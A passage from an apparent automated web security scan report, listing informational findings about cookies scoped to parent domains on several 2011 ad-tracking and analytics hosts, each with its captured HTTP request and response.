y//kxyHIB1otYfec3oESL3KgwPx4NyC/mDgzZQ1wt8ul6U9FCachkJ20hyVwespxYmr1+C05loldoIpguKfJkypsL+OS6RJU5FePTqpTUUoONn9nUKTy2Lsf5oc+Ek523257M/WcT6RgFIYhPu9y3Yr0rRdU0ulvPgycSTBrckLVb+D20GBuAyvfHoRoF62HV3ayGi/zh8siNJrhagSxaDEwXFucKUtavUMYEKTuRC8j2Ms7UyozH2JneopaDxgNJk+MKoVo2q5POAaOWl4Qa+4MMIBI5QEx757bfG9N5l7UiP4bmcg7jXVgOBlxvHVpqzaHZqbeE+hJAaYTgNJzGErBSf/JcZb+Bq1cxASNCLskHhpluAui7Mx3UfrKvZg1TBQAUT8tUmtBQVGG2rNrP8rUiTrIqJusRRAFGN4Z3Q4huvP+/6v0ly/Ajia3r0+PTunlBnF8m6hgek8/eD/1KZcpcezRJIH+FJffqEgwDG4XaW9PDSOnZVfZ97kzQFJ1DsgF7eT6O/leYLQbV7H1yx7g68Z9yK9XBfVT3Gp8e2mhq9IibPvafvXO9k9+fkyyzaLP+99jIeYOAGU/SjLsIF0PeYW9M3EVanQgdnNYYMm5zSlzveLFp1n6uSQCAGzn5SFQqGhfFuWQmTiQt2RxusqhOc/01vsL/Xim8k33jwRkhzBq27oQ
DyOwKJknkzJXI+dt6w/jVSbNHb/KGbMBj+GrY7ubtdTvUsuH"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:01:39 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

9.6. http://adx.adnxs.com/mapuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: sess, uuid2 and anj, each set with domain=.adnxs.com and HttpOnly in the response below. The cookies do not appear to contain session tokens, which reduces the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=181&user=CAESECFrKvBlT-cBj-xM8B2ECfY&cver=1 HTTP/1.1
Host: adx.adnxs.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIvoIBEAoYASABKAEw3eiy8AQQ3eiy8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw)lBAbL-*cOV4KBhCoR25DY(2vp1RESM(2J.fYtvlqPT[cJfVZWo!V7]TG9T)_>#0+zM2gLr6r'WB<PBs]9<X5zx]>^#n%)np%pON9vhK:9sozd5e72axY9NVZ-Im3Zl[S6U?nDk]]Xl0Xr0'9Q2+(5tDV>!8=:3mY$vNb@+D3Ap?G2CBJ4BAix#<U2/j@vzKW10dnb=eCp5B>h>13URKjY5=1]w9C4HMCvuXQGV:it%G2`n9'(TGCQPS<$z^e]Z6NT!6(]HiUVWS)l>c@S8hzH=`<c`vTNPHYaQatBmG@L<igeF=L:^rOE'Hh@#EVR.`=Ux-/<GuTk06++UaGeq'fCBda.X#5PD%g*pg(D*8cY.faZU4k(iYnRV)LFflEn[fHA_LLir)NJ*<UER3ZsiPR>'5esbJ6E8wJTgDvz0]o5KL#F%J7s%dO.T8<793E1psbJ#N3F[i-tl_w_uU>pc>OI(54nFrLmI9z-JW>V/5Y17SfF#Dw)<8nEGEcWzw+u%cChmb4sj7vmp8Od3LAg``vx]:q5^0bCr_Cf.Fhu[tN+9H5I9@_tH4p>Gujl>i$HGt4v8Sw>Lr<m=^M?dyN<JFq0>r=MRS4E+.tPFsOwox/t_9W(AW))oO^b9Xw!u2#qD12xd^$tmhgU5n.:$%hL+W<DJ<:Pz0B98#Xqpp?6Wy9Oa3_U!_mQ0wXAsekf4^D8rmfvGk2vLba!V(^MK7<<jaaH$q-TUqB'0!$_/J2aEL.bEnn+lmE)fcs3@JzL-8_qNIb.7`cZ4G#S'Y?4)j9xsUji[+!jWL:^kCTR)%?W^

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 07-Jul-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)lBAbL-*cOV4KBhCoR25DY(2vp1RESM(2J.fYtvlqPT[cJfVZWo!V7]TG9T)_>#0+zM2gLr6r'WB<PBs]9<X5zx]>^#n%)np%pON9vhK:9sozd5e72axY9NVZ-Im3Zl[S6U?nDk]]Xl0Xr0'9Q2+(5tDV>!8=:3mY$vNb@+D3Ap?G2CBJ4BAix#<U2/j@vzKW10dnb=eCp5B>h>13URKjY5=1]w9C4HMCvuXQGV:it%G2`n9'(TGCQPS<$z^e]Z6NT!6(]HiUVWS)l>c@S8hzH=`<c`vTNPHYaQatBmG@L<igeF=L:^rOE'Hh@#EVR.`=Ux-/<GuTk06++UaGeq'fCBda.X#5PD%g*pg(D*8cY.faZU4k(iYnRV)LFflEn[fHA_LLir)NJ*<UER3ZsiPR>'5esbJ6E8wJTgDvz0]o5KL#F%J7s%dO.T8<793E1psbJ#N3F[i-tl_w_uU>pc>OI(54nFrLmI9z-JW>V/5Y17SfF#Dw)<8nEGEcWzw+u%cChmb4sj7vmp8Od3LAg``vx]:q5^0bCr_Cf.Fhu[tN+9H5I9@_tH4p>Gujl>i$HGt4v8Sw>Lr<m=^M?dyN<JFq0>r=MRS4E+.tPFsOwox/t_9W(AW))oO^b9Xw!u2#qD12xd^$tmhgU5n.:$%hL+W<DJ<:Pz0B98#Xqpp?6Wy9Oa3_U!_mQ0wXAsekf4^D8rmfvGk2vLba!V(^MK7<<jaaH$q-TUqB'0!$_/J2aEL.bEnn+lmE)fcs3@JzL-8_qNIb.7`cZ4G#S'Y?4)j9xsUji[+!jWL:^kCTR)%?W^; path=/; expires=Tue, 04-Oct-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Wed, 06 Jul 2011 15:39:08 GMT

GIF89a.............!.......,........@..L..;

9.7. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (the UID cookie in the response below, with domain=.scorecardresearch.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=6635176&rn=1308436746&c7=http%3A%2F%2Fbcp.crwdcntrl.net%2F4%2Fc%3D34%257Crand%3D395066690%257Cpv%3Dy%257Crt%3Difr&c9=http%3A%2F%2Fwww.bebo.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/4/c=34%7Crand=395066690%7Cpv=y%7Crt=ifr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 06 Jul 2011 11:22:09 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Fri, 05-Jul-2013 11:22:09 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


9.8. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (the UID cookie in the response below, with domain=.scorecardresearch.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p HTTP/1.1
Host: b.scorecardresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Length: 0
Location: http://b.scorecardresearch.com/p2?
Date: Wed, 06 Jul 2011 11:21:27 GMT
Connection: close
Set-Cookie: UID=845ba2-96.6.41.192-1309951287; expires=Fri, 05-Jul-2013 11:21:27 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


9.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (the u2 cookie in the response below, with domain=.serving-sys.com; the eyeblaster cookie is scoped to the issuing host itself). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5650363~~0~~~^ebAdDuration~899~0~01020&OptOut=0&ebRandom=0.8620431364979595&flv=10.3181&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
Origin: http://pubads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=6d1502f0-782c-4c66-9617-aa4652ec4df13IV010; expires=Tue, 04-Oct-2011 07:36:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.3181&RES=128&WMPV=0; expires=Tue, 04-Oct-2011 07:36:40 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 06 Jul 2011 11:36:39 GMT
Connection: close
Content-Length: 0


9.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (the A3 and B3 cookies in the response below, with domain=.serving-sys.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2800593&PluID=0&w=300&h=250&ncu=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3tv7QUUUTsa3EM_ylAekkezuAa3mhMIBo5ejqBCFk__xOwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi0xNzY3NDYzNTAzNTIwODY3oAGrl7rtA7IBDHd3dy5iZWJvLmNvbboBCjMwMHgyNTBfYXPIAQnaARRodHRwOi8vd3d3LmJlYm8uY29tL5gCxBPAAgXIApWysAvgAgDqAhlCZWJvX0hvbWVfMzAweDI1MF9BVEZMZWZ0qAMB6APCBOgD0wHoA_gD9QMAAIDB4AQBgAbPpJns29D66cwB%26num%3D1%26sig%3DAGiWqtwsO8bMZJ6jQcjqukrS_j5W81cmAg%26client%3Dca-pub-1767463503520867%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1d0i0ts0JCfAI6XYs8DR1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgC0CRj.%2526redirectURL%253D&ord=ThRFQQAEG8YK5TlPHdsIpA==&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; ActivityInfo=000dg4csN%5f000db5csN%5f000tbQcu6%5f000rFIcsM%5f000tbRcu6%5f; A3=gs35b0E.0ca7000009bExaZS0084o00002h8evaYRd0bI400000kYwuaZXq09MY00001kSEGaZWa03sY00001lp66b0xe0dMv00002lGhvb0Ah0cEt00003kPIlaZWa03sY00000kFaLa.2L09EZ00001jem9a.2L0c7wa.2L1kHgIb0v.02WG00001kLQDb0xt0cbO00001lEOyaYx40cie00001h51Tb0yn0ca700002eBxyaZST03iw00001h4.ob0xr0ca700002hePeb0wK0cbO00001l7XCa+WC08Y500001lzuRa+WF0ckj00001h4.pb0vz0ca700001h51Sb0Ah0ca700001lFP5aZRG0dSu00001lkqFa.2B06hH00001leMha.2F06hH00001jmcDa.2B0c7w00001jDBSaZUd0cbS00001kovFb0xt0cjc00002l.wtb0wj07Nz00001kSCsaZWb03sY00001le66b1nb02WG00001lGkWb0vy0cEt00001jmdZa.2F0c7w00001jDDva+WC0cbS00001jDCqa+WC0cbS00001hePyb0xq0cbO00001lu2rb0yg04m400001gs36b0xr0ca700000iyQIaYRd0bnA00001lu0naYvn0czN00002iz3QaZRG0bnA00001; B3=78ox0000000001vc835N0000000001vjanad0000000001vc990p0000000001v5atH70000000001vfawTK0000000002vjaFbT0000000001vmaKr10000000001vjaJmE0000000001vcajpm0000000001vcajpn0000000000vc9l7u0000000001vf8SCH0000000001vcamoJ0000000001v59xv30000000001vf9xvo0000000001vc82MD0000000003vjaF580000000001vk82MC0000000003vkaAsi0000000001vf9xv40000000001vf8n.z0000000000v9afgy0000000001vf838g0000000001vj9yJj0000000001vj8SC30000000001v982ME0000000000vjaHLh0000000001vfaF7y0000000002v89u4N0000000002vj838c0000000001vjawPH0000000001vf9.360000000001v89i8L0000000001vf82MA0000000000vkajpj0000000001vc90mq0000000001v54ZUH0000000002vc7dNF0000000001vjaKr20000000003vk

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=gs35b0E.0ca7000009bExaZS0084o00002kYwuaZXq09MY00001h8evaYRd0bI400000lGhvb0Ah0cEt00003lp66b0xe0dMv00002kSEGaZWa03sY00001kPIlaZWa03sY00000kHgIb0v.02WG00001jem9a.2L0c7wa.2L1kFaLa.2L09EZ00001lEOyaYx40cie00001kLQDb0xt0cbO00001h4.ob0xr0ca700002eBxyaZST03iw00001h51Tb0yn0ca700002h51Sb0Ah0ca700001h4.pb0vz0ca700001lzuRa+WF0ckj00001l7XCa+WC08Y500001hePeb0wK0cbO00001lzuXb3sV0ckj00001leMha.2F06hH00001lkqFa.2B06hH00001lFP5aZRG0dSu00001kovFb0xt0cjc00002jDBSaZUd0cbS00001jmcDa.2B0c7w00001kSCsaZWb03sY00001l.wtb0wj07Nz00001jDCqa+WC0cbS00001jDDva+WC0cbS00001jmdZa.2F0c7w00001lGkWb0vy0cEt00001le66b1na02WG00001hePyb0xq0cbO00001gs36b0xr0ca700000lu2rb0yg04m400001iz3QaZRG0bnA00001iyQIaYRd0bnA00001; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=78ox0000000001vcawTK0000000002vjatH70000000001vf990p0000000001v5anad0000000001vc835N0000000001vjajpm0000000001vcaJmE0000000001vcaKr10000000001vjaFbT0000000001vm9l7u0000000001vfajpn0000000000vcamoJ0000000001v58SCH0000000001vc9xv30000000001vf9xvo0000000001vc82MD0000000003vj838g0000000001vjafgy0000000001vf8n.z0000000000v99xv40000000001vfaAsi0000000001vf82MC0000000003vkaF580000000001vk9yJj0000000001vj82ME0000000000vj8SC30000000001v99u4N0000000002vjaF7y0000000002v8aHLh0000000002vs9i8L0000000001vf9.360000000001v8awPH0000000001vf838c0000000001vjaKr20000000003vk7dNF0000000001vj4ZUH0000000002vc90mq0000000001v5ajpj0000000001vc82MA0000000000vk; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 06 Jul 2011 11:21:39 GMT
Connection: close
Content-Length: 2366

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

9.11. http://bstats.adbrite.com/adserver/behavioral-data/0

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /adserver/behavioral-data/0

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (the ut and vsd cookies in the response below, with domain=.adbrite.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/0?d=48272602;bapid=12553;uid=1030306;neg=1 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:762701:20861280:E3F32BD05A8DDF4D5646D79640088B:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MtDJSMoyqkkvyKoqTy5IrjG0MizJqyjIsDK1MszPq1CqBQA%3D"; srh="1%3Aq64FAA%3D%3D"; rb2=CiMKBjc0MjY5NxjY6J2rHyITNDMyNTg5NzI4OTgzNjQ4MTgzMAouCgY3NjI3MDEYva3q3iYiHkUzRjMyQkQwNUE4RERGNEQ1NjQ2RDc5NjQwMDg4QhAB; ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; vsd=0@1@4e144551@bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; path=/; domain=.adbrite.com; expires=Sat, 03-Jul-2021 15:39:06 GMT
Set-Cookie: vsd=0@2@4e14819a@view.atdmt.com; path=/; domain=.adbrite.com; expires=Fri, 08-Jul-2011 15:39:06 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Wed, 06 Jul 2011 15:39:06 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

9.12. http://cang.baidu.com/do/add

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cang.baidu.com
Path:   /do/add

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (the BAIDUID cookie in the response below, with domain=.baidu.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /do/add?it=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&iu=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&fr=ien&dc= HTTP/1.1
Host: cang.baidu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:26 GMT
Server: apache 1.0.9.0
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Set-Cookie: BAIDUID=92E2D2F2A0513651099D245A96DCDBBE:FG=1; expires=Wed, 06-Jul-41 11:21:26 GMT; path=/; domain=.baidu.com
Content-Type: text/html
Cache-Control: no-cache
Connection: close
Content-Length: 7393

<?xml version="1.0" encoding="gb2312"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xh
...[SNIP]...

9.13. http://clk.atdmt.com/MRT/go/285207471/direct/01/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /MRT/go/285207471/direct/01/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (the ach00 and ach01 cookies in the response below, with domain=.atdmt.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MRT/go/285207471/direct/01/ HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://view.atdmt.com/action/atlasdmt_home
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=903d/120af:6cf8/2750d:d99f/1afe8:bab9/11176:ba67/1c4e:f594/1c01f:66c2/39a1:66c2/3877; expires=Friday, 05-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=ce81a74/120af/134f208a/903d/4dd2907e:cf0807d/2750d/135a6ad5/6cf8/4de0ff1b:8a892c1/1afe8/bfedd64/d99f/4de0ffc1:a34fe32/11176/ab3574a/bab9/4de6e487:224f750/1c4e/4919ce6/ba67/4de6e67b:421378c/1c01f/825b020/f594/4de7e7e5:421378c/1c01f/8b4ca16/f594/4de7e7e7:421378c/1c01f/88b46ce/f594/4de7ecb3:c62bb85/39a1/123ee4af/66c2/4dfffb75:c388719/39a1/1235b344/66c2/4e008e93:c3ee9ca/3877/123ee6eb/66c2/4e008f9b; expires=Friday, 05-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Wed, 06 Jul 2011 11:40:44 GMT
Connection: close


9.14. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (the uid cookie in the response below, with Domain=.p-td.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/ HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=3831&action=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8496530639253255806

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8496530639253255806; Domain=.p-td.com; Expires=Mon, 02-Jan-2012 11:21:57 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Wed, 06 Jul 2011 11:21:56 GMT

GIF89a.............!.......,...........D..;

9.15. https://ebanking.ubs.com/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ebanking.ubs.com
Path:   /en/

Issue detail

